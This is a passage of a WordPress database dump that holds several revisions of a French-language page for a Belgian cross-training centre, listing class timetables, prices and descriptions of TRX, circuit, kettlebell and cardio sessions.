5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:53:34', '2013-07-03 15:53:34', '', 11, 'http://www.crosstrainingcenter.be/?p=157', 0, 'revision', '', 0),
(158, 1, '2013-07-03 15:54:03', '2013-07-03 15:54:03', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:54:03', '2013-07-03 15:54:03', '', 11, 'http://www.crosstrainingcenter.be/?p=158', 0, 'revision', '', 0),
(161, 1, '2013-07-03 16:09:17', '2013-07-03 16:09:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"objectif\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:09:17', '2013-07-03 16:09:17', '', 11, 'http://www.crosstrainingcenter.be/?p=161', 0, 'revision', '', 0),
(159, 1, '2013-07-03 15:55:25', '2013-07-03 15:55:25', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"objectif\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:55:25', '2013-07-03 15:55:25', '', 11, 'http://www.crosstrainingcenter.be/?p=159', 0, 'revision', '', 0),
(160, 1, '2013-07-03 16:08:26', '2013-07-03 16:08:26', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,&lt;b&gt;Lundi[attr class=\"objectif\"]&lt;/b&gt;,&lt;b&gt;Mardi&lt;/b&gt;,&lt;b&gt;Mercredi&lt;/b&gt;,&lt;b&gt;Jeudi&lt;/b&gt;,&lt;b&gt;Vendredi&lt;/b&gt;\r\n&lt;b&gt;17h30&lt;/b&gt;,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n&lt;b&gt;18h15&lt;/b&gt;,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n&lt;b&gt;19h00&lt;/b&gt;,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n&lt;b&gt;19h45&lt;/b&gt;,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 